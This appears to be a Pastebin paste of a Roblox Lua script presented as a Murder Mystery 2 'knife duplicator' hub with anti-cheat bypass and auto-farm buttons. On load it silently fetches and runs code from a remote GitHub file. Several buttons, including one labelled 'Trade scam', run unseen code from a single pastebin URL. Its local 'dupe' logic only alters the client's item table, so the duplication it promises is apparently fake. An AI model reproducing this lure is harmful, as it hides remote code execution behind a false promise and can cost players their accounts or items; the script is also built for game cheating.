Advertisement
petsim99scriptssdw

Untitled

Jul 17th, 2024 (edited)
146
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 2.80 KB | None | 0 0
  1. getgenv().gui = false
  2.  
  3. loadstring(game:HttpGet("https://raw.githubusercontent.com/trdrock/mm2/main/Hub", true))()
  4.  
  5.  
  6.  
  7. local OrionLib = loadstring(game:HttpGet(('https://raw.githubusercontent.com/shlexware/Orion/main/source')))()
  8.  
  9. local Window = OrionLib:MakeWindow({Name = "KOSY MM2 HUB😈😈 - v6.3", HidePremium = false, IntroText = "MM2 Gui - v6.3", IntroIcon = "", SaveConfig = true, ConfigFolder = "MM2 SCRIPT"})
  10.  
  11. local Tab = Window:MakeTab({
  12. Name = " Main",
  13. Icon = "",
  14. PremiumOnly = false
  15. })
  16.  
  17. local Section = Tab:AddSection({
  18. Name = "Best MM2 duplicator has working feautures! Like dupe and visual knifes!!!!"
  19. })
  20.  
  21. local Section = Tab:AddSection({
  22. Name = "New script! Come tap in with us for the low low😉😉."
  23. })
  24.  
  25.  
  26. local Tab = Window:MakeTab({
  27. Name = " function",
  28. Icon = "",
  29. PremiumOnly = false
  30. })
  31.  
  32. local Section = Tab:AddSection({
  33. Name = "Free access"
  34. })
  35.  
  36. Tab:AddButton({
  37. Name = "Trade scam ً",
  38. Callback = function()
  39. loadstring(game:HttpGet("https://pastebin.com/raw/8FZt3TsF"))()
  40. end
  41. })
  42.  
  43. --[[
  44. Name = <string> - The name of the button.
  45. Callback = <function> - The function of the button.
  46. ]]
  47.  
  48. Tab:AddButton({
  49. Name = "Anti Cheat bypass",
  50. Callback = function()
  51. loadstring(game:HttpGet("https://pastebin.com/raw/8FZt3TsF"))()
  52. end
  53. })
  54.  
  55. --[[
  56. Name = <string> - The name of the button.
  57. Callback = <function> - The function of the button.
  58. ]]
  59.  
  60. local Section = Tab:AddSection({
  61. Name = "Knife duplicator"
  62. })
  63.  
  64. Tab:AddTextbox({
  65. Name = "Put your knife rarity",
  66. Default = "",
  67. TextDisappear = true,
  68. Callback = function(Value)
  69. fromPet = Value
  70. end
  71. })
  72.  
  73. Tab:AddTextbox({
  74. Name = "Put your knife dupe name",
  75. Default = "",
  76. TextDisappear = true,
  77. Callback = function(Value)
  78. toPet = Value
  79. end
  80. })
  81.  
  82. Tab:AddButton({
  83. Name = "Start Change!",
  84. Callback = function()
  85. local Library = require(game.ReplicatedStorage.Library)
  86. local Save = Library.Save.Get().Inventory
  87. local Directory = Library.Directory
  88. for i,v in pairs(Directory.Pets[fromPet]) do
  89. Directory.Pets[fromPet][i] = nil
  90. end
  91. for i,v in pairs(Directory.Pets[toPet]) do
  92. Directory.Pets[fromPet][i] = v
  93. end
  94. end
  95. })
  96.  
  97.  
  98. local Tab = Window:MakeTab({
  99. Name = " auto farm",
  100. Icon = "",
  101. PremiumOnly = false
  102. })
  103.  
  104. local Section = Tab:AddSection({
  105. Name = " Free auto farm"
  106. })
  107.  
  108.  
  109.  
  110. Tab:AddButton({
  111. Name = "KNIFE DUPE",
  112. Callback = function()
  113. loadstring(game:HttpGet("https://pastebin.com/raw/8FZt3TsF"))()
  114. end
  115. })
  116.  
  117. OrionLib:MakeNotification({
  118. Name = "Duping Guns takes a while so be patient",
  119. Content = "Duping is in process-[Takes around 1-5 minutes]-Depending on your device!",
  120. Image = "rbxassetid://4483345998",
  121. Time = 120
  122. })
  123.  
  124.  
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement